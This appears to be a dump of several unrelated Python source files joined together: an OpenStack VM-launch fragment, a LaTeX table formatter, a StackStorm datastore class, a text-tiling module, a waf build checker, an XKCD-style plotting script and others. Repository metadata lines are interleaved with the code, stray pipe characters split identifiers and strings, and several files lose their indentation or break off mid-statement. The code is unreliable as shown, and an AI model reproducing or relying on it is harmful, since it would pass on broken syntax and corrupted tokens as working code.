requested_basevm_id = meta_info['base_vm_sha256']
# find matching base VM
image_list = get_list(server_address, token, end_point, "images")
basevm_uuid = None
basevm_xml = None
basevm_name = None
basevm_disk = 0
for image in image_list:
properties = image.get("metadata", None)
if properties is None or len(properties) == 0:
continue
if properties.get(CLOUDLET_TYPE.PROPERTY_KEY_CLOUDLET_TYPE) != \
CLOUDLET_TYPE.IMAGE_TYPE_BASE_DISK:
continue
base_sha256_uuid = properties.get(CLOUDLET_TYPE.PROPERTY_KEY_BASE_UUID)
if base_sha256_uuid == requested_basevm_id:
basevm_uuid = image['id']
basevm_name = image['name']
basevm_xml = properties.get(
CLOUDLET_TYPE.PROPERTY_KEY_BASE_RESOURCE,
None)
basevm_disk = image.get('minDisk', 0)
break
if basevm_uuid is None:
raise CloudletClientError(
"Cannot find matching Base VM with (%s)" %
str(requested_basevm_id))
# find matching flavor
if basevm_xml is None:
msg = "Cannot find resource allocation information of base VM (%s)" %\
str(requested_basevm_id)
raise CloudletClientError(msg)
cpu_count, memory_mb = get_resource_size(basevm_xml)
flavor_list = get_list(server_address, token, end_point, "flavors")
flavor_ref, flavor_id = find_matching_flavor(flavor_list, cpu_count,
memory_mb, basevm_disk)
if flavor_ref == None or flavor_id == None:
msg = "Cannot find matching flavor with vcpu:%d, ram:%d, disk:%d\n" % (
cpu_count, memory_mb, basevm_disk)
msg += "Please create one at your OpenStack"
raise CloudletClientError(msg)
# generate request
meta_data = {"handoff_info": overlay_url}
s = {"server":
{
"name": server_name, "imageRef": str(basevm_uuid),
"flavorRef": flavor_id, "metadata": meta_data,
"min_count": "1", "max_count": "1",
"key_name": None,
}
}
params = json.dumps(s)
headers = {"X-Auth-Token": token, "Content-type": "application/json"}
conn |
import sys
# Usage: MakeTableResultsandErrors.py <params-file> <errors-file>
# Merges fitted parameter values with their errors into LaTeX table rows of
# the form "$value\pm error$", then prints them grouped five wedges per
# table section.  (Single-argument print(...) and // keep this runnable on
# both Python 2 and Python 3 without changing Python 2 behavior.)
params = open(sys.argv[1], 'r')
errors = open(sys.argv[2], 'r')

# Parse the error file: one bracketed, comma-separated list per line.
error = []
for line in errors:
    if len(line) < 5:
        continue
    error.append(list(map(float, line.replace('[', '').replace(']', '').split(','))))

print(error)

output = []
count = 0
paramCount = 0
# Decimal places to keep for each of the 20 parameters, in order.
roundValues = [4, 2, 2, 1, 1, 2, 2, 1, 2, 1, 1, 2, 2, 1, 2, 1, 1, 2, 2, 1]
for line in params:
    out = ""
    ln = line.replace(' ', '').split(",")
    for i in range(len(ln)):
        if ln[i] == '\n':
            continue
        out += "$" + str(round(float(ln[i]), roundValues[paramCount])) + "\pm" + str(round(error[count][paramCount], roundValues[paramCount])) + "$ & "
        paramCount += 1
    # Drop the trailing " & " separator.
    output.append(out[0:len(out)-3])
    if paramCount == 20:
        count += 1
        paramCount = 0

for i in output:
    print(i)

# Emit four table sections, each listing every fifth wedge (9..23).
wedge = range(9, 24)
for i in range(4):
    count = 0
    for j in range(len(output)//5 + 1):
        print(str(wedge[count]) + " & " + output[j*5+i] + " \\\\")
        print("\hline")
        count += 1
    print("")
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import timedelta
from st2client.client import Client
from st2client.models import KeyValuePair
from st2common.services.access import create_token
from st2common.util.api import get_full_public_api_url
from st2common.util.date import get_datetime_utc_now
from st2common.constants.keyvalue import DATASTORE_KEY_SEPARATOR, SYSTEM_SCOPE
class DatastoreService(object):
"""
Class provides public methods for accessing datastore items.
"""
DATASTORE_NAME_SEPARATOR = DATASTORE_KEY_SEPARATOR
    def __init__(self, logger, pack_name, class_name, api_username):
        """Create a datastore service bound to one pack/class identity.

        :param logger: logger used for audit/exception messages
        :param pack_name: pack the keys are namespaced under
        :param class_name: class (sensor/action) the keys are namespaced under
        :param api_username: user to mint short-lived auth tokens for
        """
        self._api_username = api_username
        self._pack_name = pack_name
        self._class_name = class_name
        self._logger = logger
        # Lazily-created API client, recreated once its token expires.
        self._client = None
        self._token_expire = get_datetime_utc_now()
##################################
# Methods for datastore management
##################################
def list_values(self, local=True, prefix=None):
"""
Retrieve all the datastores items.
:param local: List values from a namespace local to this pack/class. Defaults to True.
:type: local: ``bool``
:param prefix: Optional key name prefix / startswith filter.
:type prefix: ``str``
:rtype: ``list`` of :class:`KeyValuePair`
"""
client = self._get_api_client()
self._logger.audit('Retrieving all the value from the datastore')
key_prefix = self._get_full_key_prefix(local=local, prefix=prefix)
kvps = client.keys.get_all(prefix=key_prefix)
return kvps
def get_value(self, name, local=True, scope=SYSTEM_SCOPE, decrypt=False):
"""
Retrieve a value from the datastore for the provided key.
By default, value is retrieved from the namespace local to the pack/class. If you want to
retrieve a global value from a datastore, pass local=False to this method.
:param name: Key name.
:type name: ``str``
:param local: Retrieve valu | e from a namespace local to the pack/class. Defaults to True.
:type: local: ``bool``
:param scope: Scope under which item is sa | ved. Defaults to system scope.
:type: local: ``str``
:param decrypt: Return the decrypted value. Defaults to False.
:type: local: ``bool``
:rtype: ``str`` or ``None``
"""
if scope != SYSTEM_SCOPE:
raise ValueError('Scope %s is unsupported.' % scope)
name = self._get_full_key_name(name=name, local=local)
client = self._get_api_client()
self._logger.audit('Retrieving value from the datastore (name=%s)', name)
try:
params = {'decrypt': str(decrypt).lower(), 'scope': scope}
kvp = client.keys.get_by_id(id=name, params=params)
except Exception as e:
self._logger.exception(
'Exception retrieving value from datastore (name=%s): %s',
name,
e
)
return None
if kvp:
return kvp.value
return None
def set_value(self, name, value, ttl=None, local=True, scope=SYSTEM_SCOPE, encrypt=False):
"""
Set a value for the provided key.
By default, value is set in a namespace local to the pack/class. If you want to
set a global value, pass local=False to this method.
:param name: Key name.
:type name: ``str``
:param value: Key value.
:type value: ``str``
:param ttl: Optional TTL (in seconds).
:type ttl: ``int``
:param local: Set value in a namespace local to the pack/class. Defaults to True.
:type: local: ``bool``
:param scope: Scope under which to place the item. Defaults to system scope.
:type: local: ``str``
:param encrypt: Encrypt the value when saving. Defaults to False.
:type: local: ``bool``
:return: ``True`` on success, ``False`` otherwise.
:rtype: ``bool``
"""
if scope != SYSTEM_SCOPE:
raise ValueError('Scope %s is unsupported.', scope)
name = self._get_full_key_name(name=name, local=local)
value = str(value)
client = self._get_api_client()
self._logger.audit('Setting value in the datastore (name=%s)', name)
instance = KeyValuePair()
instance.id = name
instance.name = name
instance.value = value
instance.scope = scope
if encrypt:
instance.secret = True
if ttl:
instance.ttl = ttl
client.keys.update(instance=instance)
return True
def delete_value(self, name, local=True, scope=SYSTEM_SCOPE):
"""
Delete the provided key.
By default, value is deleted from a namespace local to the pack/class. If you want to
delete a global value, pass local=False to this method.
:param name: Name of the key to delete.
:type name: ``str``
:param local: Delete a value in a namespace local to the pack/class. Defaults to True.
:type: local: ``bool``
:param scope: Scope under which item is saved. Defaults to system scope.
:type: local: ``str``
:return: ``True`` on success, ``False`` otherwise.
:rtype: ``bool``
"""
if scope != SYSTEM_SCOPE:
raise ValueError('Scope %s is unsupported.', scope)
name = self._get_full_key_name(name=name, local=local)
client = self._get_api_client()
instance = KeyValuePair()
instance.id = name
instance.name = name
self._logger.audit('Deleting value from the datastore (name=%s)', name)
try:
params = {'scope': scope}
client.keys.delete(instance=instance, params=params)
except Exception as e:
self._logger.exception(
'Exception deleting value from datastore (name=%s): %s',
name,
e
)
return False
return True
def _get_api_client(self):
"""
Retrieve API client instance.
"""
token_expire = self._token_expire <= get_datetime_utc_now()
if not self._client or token_expire:
self._logger.audit('Creating new Client object.')
ttl = (24 * 60 * 60)
self._token_expire = get_datetime_utc_now() + timedelta(seconds=ttl)
temporary_token = create_token(username=self._api_username, ttl=ttl)
api_url = get_full_public_api_url()
self._client = Client(api_url=api_url, token=temporary_token.token)
return self._client
def _get_full_key_name(self, name, local):
"""
Retrieve a full key name.
:rtype: ``str``
"""
if local:
name = self._get_key_name_with_prefix(name=name)
return name
def _get_full_key_prefix(self, local, prefix=None):
if local:
key_prefix = self._get_local_key_name_prefix()
if prefix:
key_prefix += prefix
else:
key_prefix = prefix
return key_prefix
def _get_local_key_name_prefix(self):
"""
Retrieve key prefix which is local to this pack/class.
"""
        key_prefix = self._get_datastore_key_prefix()
"""
lexical chain module for text tiling
"""
from tile_reader import TileReader
from scoring import boundarize, depth_scoring, window_diff
# ======================================================================================================================
# Main
# ======================================================================================================================
class LexicalChains(object):
    """Computes lexical chains over a document and derives topic boundaries.

    A chain is "active" across a sentence gap when sentences within ``window``
    of each other share a lemma; gaps with few active chains are candidate
    topic boundaries (TextTiling-style segmentation).
    """

    def __init__(self):
        self.sentences = []        # preprocessed (POS-filtered, lemmatized) sentences
        self.actives = {}          # gap index -> set of lemmas active across that gap
        self.gap_scores = []       # number of active chains per gap, in gap order
        self.boundary_vector = []  # 1/0 per sentence: 1 when it starts a new tile

    def analyze(self, sents, window=4, pos_filter=('PUNCT', 'SYM', 'SPACE', 'DET'), boundary_type='liberal'):
        """
        Set attributes

        :param sents: (list) spacy-analyzed sentences
        :param window: (int) distance threshold within which chains are considered active
        :param boundary_type: (str) 'liberal' or 'conservative' boundary scoring
        :param pos_filter: (tuple) spacy pos_ labels to exclude (i.e. a pos-based stoplist)
        :return: void
        """
        self.sentences = self._preproc(sents, pos_filter)
        self.actives = self._get_actives(self.sentences, window)
        # Iterate gap indices in sorted order so scores line up positionally
        # with gaps (plain dict key order is arbitrary on older Pythons).
        self.gap_scores = [len(self.actives[k]) for k in sorted(self.actives)]
        self.boundary_vector = self._get_boundaries(self.gap_scores, boundary_type)

    @staticmethod
    def _preproc(sentences, pos_filter):
        """
        Filters out stop POSs and lemmatizes sentences

        :param sentences: list of tokenized sentences in doc
        :param pos_filter: tuple of spacy pos_ labels to filter out
        :return: list of lists of lemma strings
        """
        filtered = [[tok for tok in sent if tok.pos_ not in pos_filter] for sent in sentences]
        lemmatized = [[tok.lemma_ for tok in sent] for sent in filtered]
        return lemmatized

    @staticmethod
    def _get_actives(sents, window):
        """
        Get active lexical chains for each gap between sentences

        :param sents: list of tokenized (lemmatized) sentences
        :param window: difference threshold over which lexical chains are considered active
        :return: dict mapping each gap index to its set of active chains
        """
        # initialize one empty chain set per sentence gap
        actives = {}
        for gap in range(len(sents) - 1):
            actives[gap] = set()

        # enumerate() instead of sents.index(sent): index() returns the FIRST
        # occurrence, which mis-attributes duplicate sentences (and costs
        # O(n) per lookup).
        for i, sent in enumerate(sents):
            uniques_i = set(sent)

            # loop over all sentences within the distance threshold of current
            for diff in range(window, 0, -1):
                # back off when fewer sentences remain than the threshold
                while not i + diff < len(sents):
                    diff -= 1

                # find tokens shared between sent[i] and sent[i+diff]
                n = i + diff
                intersection = uniques_i.intersection(set(sents[n]))

                # mark them active across every transition between i and i+diff
                for k in range(diff):
                    actives[i + k].update(intersection)

        return actives

    @staticmethod
    def _get_boundaries(scores, boundary_type):
        """
        Calculate boundaries from gap scores

        :param scores: list containing # of active chains across each sentence gap in doc
        :param boundary_type: string indicating 'liberal' or 'conservative' boundary scoring
        :return: list indicating which sentences in doc begin new topic tiles
        """
        d_scores = depth_scoring(scores)
        boundaries = boundarize(d_scores, type=boundary_type)
        return [1] + [1 if i in boundaries else 0 for i in range(len(scores))]
# ======================================================================================================================
# Test if invoked directly
# ======================================================================================================================
if __name__ == "__main__":
    from decimal import Decimal
    import matplotlib.pyplot as plt
    import sys
    import os
    # set doc: the single CLI argument names which GUM voyage text to tile
    try:
        doc = sys.argv[1]
    except IndexError:
        sys.exit("ERROR: Expected 1 arg, got {}\nUsage: (python) lexical_chains.py <docname> <docpath>".format(
            len(sys.argv)-1))
    # get doc path (the de-headed GUM voyage texts live under data/)
    path = os.path.dirname(__file__)
    if doc in ('coron','athens','chatham','cuba','merida'):
        doc_path = os.path.join(path, os.path.join("data", "GUM_voyage_{}_noheads.txt".format(doc)))
    else:
        raise ValueError("unrecognized document: {}".format(doc))
    # get gold: one comma-separated boundary vector per text, one text per line
    gold_file = os.path.join(path, os.path.join("data", "GUM_5_gold_tiles.txt"))
    with open(gold_file) as f:
        boundaries = [[int(x) for x in line.split(",")] for line in f.read().split()]
    texts = ["athens", "chatham", "coron", "cuba", "merida"]
    gold_dict = dict(zip(texts, boundaries))
    gold = gold_dict[doc]
    # Instantiate TileReader
    reader = TileReader()
    reader.read(doc_path, newline_tokenization=True)
    sents = reader.sentences
    # Instantiate Lexical Chains
    chains = LexicalChains()
    chains.analyze(sents)
    # compare gold and predicted boundaries
    print "GOLD: {}".format(gold)
    print "MINE: {}".format(chains.boundary_vector)
    # get window_diff (integer division: this file is Python 2 code)
    window_size = len(gold)/4
    wdiff = window_diff(chains.boundary_vector, gold, window_size)
    print "Window Diff: {}".format(wdiff)
    # Plot scores; prepend 0 so gap scores align with sentence indices
    scores = [0] + chains.gap_scores
    plt.plot([x for x in xrange(len(scores))], scores)
    # green = boundary found by both, red = gold-only (miss), gray = predicted-only
    for index, grp in enumerate(zip(gold, chains.boundary_vector)):
        if 1 == grp[0] == grp[1]:
            plt.axvline(x=index, color = 'green', linewidth='2.0')
        elif 1 == grp[0] != grp[1]:
            plt.axvline(x=index, color = 'red')
        elif 1 == grp[1] != grp[0]:
            plt.axvline(x=index, color = 'gray')
    ymin, ymax = plt.ylim()
    xmin, xmax = plt.xlim()
    wdiff_rounded = round(Decimal(wdiff), 3)
    plt.text(xmax-(xmax-xmin)/4,ymax+0.5, "window diff: {}".format(wdiff_rounded))
    plt.show()
|
costibleotu/czl-scrape | sanatate/scrapy_proj/helpers/__init__.py | Python | mpl-2.0 | 147 | 0 | # -*- coding: utf-8 -*-
from scrapy_proj.helpers.leg | al import *
from scrapy_proj.helpers.romanian import *
from sc | rapy_proj.helpers.text import *
|
softDi/clusim | ns3/ns-3.26/.waf-1.8.19-b1fc8f7baef51bd2db4c2971909a568d/waflib/Tools/errcheck.py | Python | apache-2.0 | 6,003 | 0.06047 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
typos={'feature':'features','sources':'source','targets':'target','include':'includes','export_include':'export_includes','define':'defines','importpath':'includes','installpath':'install_path','iscopy':'is_copy',}
meths_typos=['__call__','program','shlib','stlib','objects']
import sys
from waflib import Logs,Build,Node,Task,TaskGen,ConfigSet,Errors,Utils
import waflib.Tools.ccroot
def check_same_targets(self):
mp=Utils.defaultdict(list)
uids={}
def check_task(tsk):
if not isinstance(tsk,Task.Task):
return
for node in tsk.outputs:
mp[node].append(tsk)
try:
uids[tsk.uid()].append(tsk)
except KeyError:
uids[tsk.uid()]=[tsk]
for g in self.groups:
for tg in g:
try:
for tsk in tg.tasks:
check_task(tsk)
except AttributeError:
check_task(tg)
dupe=False
for(k,v)in mp.items():
if len(v)>1:
dupe=True
msg='* Node %r is created more than once%s. The task generators are:'%(k,Logs.verbose==1 and" (full message on 'waf -v -v')"or"")
Logs.error(msg)
for x in v:
if Logs.verbose>1:
Logs.error(' %d. %r'%(1+v.index(x),x.generator))
else:
Logs.error(' %d. %r in %r'%(1+v.index(x),x.generator.name,getattr(x.generator,'path',None)))
if not dupe:
for(k,v)in uids.items():
if len(v)>1:
Logs.error('* Several tasks use the same identifier. Please check the information on\n https://waf.io/apidocs/Task.html?highlight=uid#waflib.Task.Task.uid')
for tsk in v:
Logs.error(' - object %r (%r) defined in %r'%(tsk.__class__.__name__,tsk,tsk.generator))
def check_invalid_constraints(self):
feat=set([])
for x in list(TaskGen.feats.values()):
feat.union(set(x))
for(x,y)in TaskGen.task_gen.prec.items():
feat.add(x)
feat.union(set(y))
ext=set([])
for x in TaskGen.task_gen.mappings.values():
ext.add(x.__name__)
invalid=ext&feat
if invalid:
Logs.error('The methods %r have invalid annotations: @extension <-> @feature/@before_method/@after_method'%list(invalid))
for cls in list(Task.classes.values()):
if sys.hexversion>0x3000000 and issubclass(cls,Task.Task)and isinstance(cls.hcode,str):
raise Errors.WafError('Class %r has hcode value %r of type <str>, expecting <bytes> (use Utils.h_cmd() ?)'%(cls,cls.hcode))
for x in('before','after'):
for y in Utils.to_list(getattr(cls,x,[])):
if not Task.classes.get(y,None):
Logs.error('Erroneous order constraint %r=%r on task class %r'%(x,y,cls.__name__))
if getattr(cls,'rule',None):
Logs.error('Erroneous attribute "rule" on task class %r (rename to "run_str")'%cls.__name__)
def replace(m):
	"""Wrap BuildContext method *m* so each call reports typo'd keyword
	arguments (those listed in the module-level ``typos`` map)."""
	original=getattr(Build.BuildContext,m)
	def wrapper(self,*k,**kw):
		ret=original(self,*k,**kw)
		for wrong in typos:
			if wrong not in kw:
				continue
			# 'iscopy' is a legitimate keyword for subst task generators
			if wrong=='iscopy'and'subst'in getattr(self,'features',''):
				continue
			Logs.error('Fix the typo %r -> %r on %r'%(wrong,typos[wrong],ret))
		return ret
	setattr(Build.BuildContext,m,wrapper)
def enhance_lib():
for m in meths_typos:
replace(m)
def ant_glob(self,*k,**kw):
if k:
lst=Utils.to_list(k[0])
for pat in lst:
if'..'in pat.split('/'):
Logs.error("In ant_glob pattern %r: '..' means 'two dots', not 'parent directory'"%k[0])
if kw.get('remove',True):
try:
if self.is_child_of(self.ctx.bldnode)and not kw.get('quiet',False):
Logs.error('Using ant_glob on the build folder (%r) is dangerous (quiet=True to disable this warning)'%self)
except AttributeError:
pass
return self.old_ant_glob(*k,**kw)
Node.Node.old_ant_glob=Node.Node.ant_glob
Node.Node.ant_glob=ant_glob
old=Task.is_before
def is_before(t1,t2):
ret=old(t1,t2)
if ret and old(t2,t1):
Logs.error('Contradictory order constraints in classes %r %r'%(t1,t2))
return ret
Task.is_before=is_before
def check_err_features(self):
lst=self.to_list(self.features)
if'shlib'in lst:
Logs.error('feature shlib -> cshlib, dshlib or cxxshlib') |
for x in('c','cxx','d','fc'):
if not x in lst and lst and lst[0]in[x+y for y in('program','shlib','stlib')]:
Logs.error('%r features is probably missing %r'%(self,x))
TaskGen.feature('*')(check_err_features)
def check_err_order(self):
if not hasattr(self,'rule')and not'subst'in Utils.to_list(self.features):
for x in('before','after','ext_in','ext_out'):
if hasattr(self,x):
Logs.warn('Erroneous o | rder constraint %r on non-rule based task generator %r'%(x,self))
else:
for x in('before','after'):
for y in self.to_list(getattr(self,x,[])):
if not Task.classes.get(y,None):
Logs.error('Erroneous order constraint %s=%r on %r (no such class)'%(x,y,self))
TaskGen.feature('*')(check_err_order)
def check_compile(self):
check_invalid_constraints(self)
try:
ret=self.orig_compile()
finally:
check_same_targets(self)
return ret
Build.BuildContext.orig_compile=Build.BuildContext.compile
Build.BuildContext.compile=check_compile
def use_rec(self,name,**kw):
try:
y=self.bld.get_tgen_by_name(name)
except Errors.WafError:
pass
else:
idx=self.bld.get_group_idx(self)
odx=self.bld.get_group_idx(y)
if odx>idx:
msg="Invalid 'use' across build groups:"
if Logs.verbose>1:
msg+='\n target %r\n uses:\n %r'%(self,y)
else:
msg+=" %r uses %r (try 'waf -v -v' for the full error)"%(self.name,name)
raise Errors.WafError(msg)
self.orig_use_rec(name,**kw)
TaskGen.task_gen.orig_use_rec=TaskGen.task_gen.use_rec
TaskGen.task_gen.use_rec=use_rec
def getattri(self,name,default=None):
if name=='append'or name=='add':
raise Errors.WafError('env.append and env.add do not exist: use env.append_value/env.append_unique')
elif name=='prepend':
raise Errors.WafError('env.prepend does not exist: use env.prepend_value')
if name in self.__slots__:
return object.__getattr__(self,name,default)
else:
return self[name]
ConfigSet.ConfigSet.__getattr__=getattri
def options(opt):
	# called when the errcheck tool is loaded: activate all the extra
	# checks by monkey-patching the waf core classes
	enhance_lib()
def configure(conf):
	# nothing to configure; the tool does all its work in options()
	pass
|
ideascube/ideascube | ideascube/cards.py | Python | agpl-3.0 | 1,516 | 0.00066 | from django.conf import settings
from ideascube.configuration import get_config
# For unittesting purpose, we need to mock the Catalog class.
# However, the mock is made in a fixture and at this moment, we don't
# know where the mocked catalog will be used.
# So the fixture mocks 'ideascube.serveradmin.catalog.Catalog'.
# If we want to use the mocked Catalog here, we must not import the
# Catalog class directly but reference it from ideascube.serveradmin.catalog
# module.
from ideascube.serveradmin import catalog as catalog_mod
def build_builtin_card_info():
    """Return one card descriptor per built-in application card id."""
    return [{'id': card_id} for card_id in settings.BUILTIN_APP_CARDS]
def build_extra_app_card_info():
    """Return one card descriptor per extra application card id."""
    return [{'id': card_id} for card_id in settings.EXTRA_APP_CARDS]
def build_package_card_info():
    """Build card descriptors for the installed packages that are selected
    for display on the home page."""
    catalog = catalog_mod.Catalog()
    displayed_ids = get_config('home-page', 'displayed-package-ids')
    cards = []
    for package in catalog.list_installed(displayed_ids):
        # most metadata fields are optional on a package, hence getattr
        cards.append({
            'id': package.template_id,
            'name': package.name,
            'description': getattr(package, 'description', ''),
            'lang': getattr(package, 'language', ''),
            'package_id': package.id,
            'is_staff': getattr(package, 'staff_only', False),
            'theme': getattr(package, 'theme', None),
            'css_class': getattr(package, 'css_class', None),
        })
    return cards
|
GoeGaming/lutris | lutris/util/audio.py | Python | gpl-3.0 | 262 | 0 | import subprocess
from lutris.util.log import logger
def reset_pulse():
    """ Reset pulseaudio. """
    # Kill the daemon, give it a second to shut down, then start it again.
    # Popen is fire-and-forget: we do not wait for the restart to finish.
    command = "pulseaudio --kill && sleep 1 && pulseaudio --start"
    subprocess.Popen(command, shell=True)
    logger.debug("PulseAudio restarted")
|
OpenBookProjects/ipynb | XKCD-style/xkcdplot.py | Python | mit | 8,352 | 0.001796 | """
XKCD plot generator
-------------------
Author: Jake Vanderplas
This is a script that will take any matplotlib line diagram, and convert it
to an XKCD-style plot. It will work for plots with line & text elements,
including axes labels and titles (but not axes tick labels).
The idea for this comes from work by Damon McDougall
http://www.mail-archive.com/matplotlib-users@lists.sourceforge.net/msg25499.html
from:
http://nbviewer.ipython.org/url/jakevdp.github.com/downloads/notebooks/XKCD_plots.ipynb
"""
import numpy as np
import pylab as pl
from scipy import interpolate, signal
import matplotlib.font_manager as fm
# We need a special font for the code below. It can be downloaded this way:
import os
import urllib2
#import urllib.request as urllib2
if not os.path.exists('Humor-Sans.ttf'):
fhandle = urllib2.urlopen('http://antiyawn.com/uploads/Humor-Sans-1.0.ttf')
open('Humor-Sans.ttf', 'wb').write(fhandle.read())
def xkcd_line(x, y, xlim=None, ylim=None,
              mag=1.0, f1=30, f2=0.05, f3=15):
    """
    Mimic a hand-drawn line from (x, y) data

    Parameters
    ----------
    x, y : array_like
        arrays to be modified
    xlim, ylim : data range
        the assumed plot range for the modification.  If not specified,
        they will be guessed from the data
    mag : float
        magnitude of distortions
    f1, f2, f3 : int, float, int
        filtering parameters.  f1 gives the size of the window, f2 gives
        the high-frequency cutoff, f3 gives the size of the filter

    Returns
    -------
    x, y : ndarrays
        The modified lines
    """
    x = np.asarray(x)
    y = np.asarray(y)

    # Fall back to the data extent when no plot range was supplied; a
    # degenerate (zero-width) range borrows the other axis' range.
    if xlim is None:
        xlim = (x.min(), x.max())
    if ylim is None:
        ylim = (y.min(), y.max())
    if xlim[1] == xlim[0]:
        xlim = ylim
    if ylim[1] == ylim[0]:
        ylim = xlim

    # Rescale both coordinates onto the unit square.
    xs = (x - xlim[0]) * 1. / (xlim[1] - xlim[0])
    ys = (y - ylim[0]) * 1. / (ylim[1] - ylim[0])

    # Total distance along the path; resampling density scales with it.
    seg_x = xs[1:] - xs[:-1]
    seg_y = ys[1:] - ys[:-1]
    path_length = np.sum(np.sqrt(seg_x * seg_x + seg_y * seg_y))

    # number of interpolated points is proportional to the distance
    n_samples = int(200 * path_length)
    u = np.arange(-1, n_samples + 1) * 1. / (n_samples - 1)

    # Fit a parametric spline through the scaled points, resample at u.
    spline_order = min(3, len(x) - 1)
    fit = interpolate.splprep([xs, ys], s=0, k=spline_order)
    x_int, y_int = interpolate.splev(u, fit[0])

    # We'll perturb perpendicular to the drawn line.
    dx = x_int[2:] - x_int[:-2]
    dy = y_int[2:] - y_int[:-2]
    dist = np.sqrt(dx * dx + dy * dy)

    # Low-pass-filtered random noise gives the hand-drawn wobble.
    coeffs = mag * np.random.normal(0, 0.01, len(x_int) - 2)
    b = signal.firwin(f1, f2 * path_length, window=('kaiser', f3))
    response = signal.lfilter(b, 1, coeffs)

    x_int[1:-1] += response * dy / dist
    y_int[1:-1] += response * dx / dist

    # Map the perturbed curve back onto the original data range.
    x_int = x_int[1:-1] * (xlim[1] - xlim[0]) + xlim[0]
    y_int = y_int[1:-1] * (ylim[1] - ylim[0]) + ylim[0]

    return x_int, y_int
def XKCDify(ax, mag=1.0,
            f1=50, f2=0.01, f3=15,
            bgcolor='w',
            xaxis_loc=None,
            yaxis_loc=None,
            xaxis_arrow='+',
            yaxis_arrow='+',
            ax_extend=0.1,
            expand_axes=False):
    """Make axis look hand-drawn

    This adjusts all lines, text, legends, and axes in the figure to look
    like xkcd plots.  Other plot elements are not modified.

    Parameters
    ----------
    ax : Axes instance
        the axes to be modified.
    mag : float
        the magnitude of the distortion
    f1, f2, f3 : int, float, int
        filtering parameters.  f1 gives the size of the window, f2 gives
        the high-frequency cutoff, f3 gives the size of the filter
    xaxis_loc, yaxis_loc : float
        The locations to draw the x and y axes.  If not specified, they
        will be drawn from the bottom left of the plot
    xaxis_arrow, yaxis_arrow : str
        where to draw arrows on the x/y axes.  Options are '+', '-', '+-', or ''
    ax_extend : float
        How far (fractionally) to extend the drawn axes beyond the original
        axes limits
    expand_axes : bool
        accepted for API compatibility; unused in this version of the code
    """
    # Get axes aspect
    ext = ax.get_window_extent().extents
    aspect = (ext[3] - ext[1]) / (ext[2] - ext[0])

    xlim = ax.get_xlim()
    ylim = ax.get_ylim()

    xspan = xlim[1] - xlim[0]
    # BUGFIX: was `ylim[1] - xlim[0]`, mixing the x and y ranges; that skewed
    # every y-offset below whenever xlim[0] != ylim[0].
    yspan = ylim[1] - ylim[0]

    xax_lim = (xlim[0] - ax_extend * xspan,
               xlim[1] + ax_extend * xspan)
    yax_lim = (ylim[0] - ax_extend * yspan,
               ylim[1] + ax_extend * yspan)

    if xaxis_loc is None:
        xaxis_loc = ylim[0]

    if yaxis_loc is None:
        yaxis_loc = xlim[0]

    # Draw axes as plain line artists so they can be wobbled like data lines
    xaxis = pl.Line2D([xax_lim[0], xax_lim[1]], [xaxis_loc, xaxis_loc],
                      linestyle='-', color='k')
    yaxis = pl.Line2D([yaxis_loc, yaxis_loc], [yax_lim[0], yax_lim[1]],
                      linestyle='-', color='k')

    # Label axes
    ax.text(xax_lim[1], xaxis_loc - 0.02 * yspan, ax.get_xlabel(),
            fontsize=14, ha='right', va='top', rotation=12)
    ax.text(yaxis_loc - 0.02 * xspan, yax_lim[1], ax.get_ylabel(),
            fontsize=14, ha='right', va='top', rotation=78)
    ax.set_xlabel('')
    ax.set_ylabel('')

    # Add title
    ax.text(0.5 * (xax_lim[1] + xax_lim[0]), yax_lim[1],
            ax.get_title(),
            ha='center', va='bottom', fontsize=16)
    ax.set_title('')

    # Wobble every line, including the two synthetic axis lines
    Nlines = len(ax.lines)
    lines = [xaxis, yaxis] + [ax.lines.pop(0) for i in range(Nlines)]

    for line in lines:
        x, y = line.get_data()

        x_int, y_int = xkcd_line(x, y, xlim, ylim,
                                 mag, f1, f2, f3)

        # create foreground and background line
        lw = line.get_linewidth()
        line.set_linewidth(2 * lw)
        line.set_data(x_int, y_int)

        # don't add background line for axes
        if (line is not xaxis) and (line is not yaxis):
            line_bg = pl.Line2D(x_int, y_int, color=bgcolor,
                                linewidth=8 * lw)

            ax.add_line(line_bg)
        ax.add_line(line)

    # Draw arrow-heads at the end of axes lines
    arr1 = 0.03 * np.array([-1, 0, -1])
    arr2 = 0.02 * np.array([-1, 0, 1])

    arr1[::2] += np.random.normal(0, 0.005, 2)
    arr2[::2] += np.random.normal(0, 0.005, 2)

    x, y = xaxis.get_data()
    if '+' in str(xaxis_arrow):
        ax.plot(x[-1] + arr1 * xspan * aspect,
                y[-1] + arr2 * yspan,
                color='k', lw=2)
    if '-' in str(xaxis_arrow):
        ax.plot(x[0] - arr1 * xspan * aspect,
                y[0] - arr2 * yspan,
                color='k', lw=2)

    x, y = yaxis.get_data()
    if '+' in str(yaxis_arrow):
        ax.plot(x[-1] + arr2 * xspan * aspect,
                y[-1] + arr1 * yspan,
                color='k', lw=2)
    if '-' in str(yaxis_arrow):
        ax.plot(x[0] - arr2 * xspan * aspect,
                y[0] - arr1 * yspan,
                color='k', lw=2)

    # Change all the fonts to humor-sans.
    prop = fm.FontProperties(fname='Humor-Sans.ttf', size=16)
    for text in ax.texts:
        text.set_fontproperties(prop)

    # modify legend
    leg = ax.get_legend()
    if leg is not None:
        leg.set_frame_on(False)

        for child in leg.get_children():
            if isinstance(child, pl.Line2D):
                x, y = child.get_data()
                child.set_data(xkcd_line(x, y, mag=10, f1=100, f2=0.001))
                child.set_linewidth(2 * child.get_linewidth())
            if isinstance(child, pl.Text):
                child.set_fontproperties(prop)

    # Set the axis limits
    ax.set_xlim(xax_lim[0] - 0.1 * xspan,
                xax_lim[1] + 0.1 * xspan)
    ax.set_ylim(yax_lim[0] - 0.1 * yspan,
                yax_lim[1] + 0.1 * yspan)

    # adjust the axes
    ax.set_xticks([])
sumaxime/LIFAP1 | TD/TD3/Code/Python/3.py | Python | mit | 243 | 0 | #!/usr/bin/python
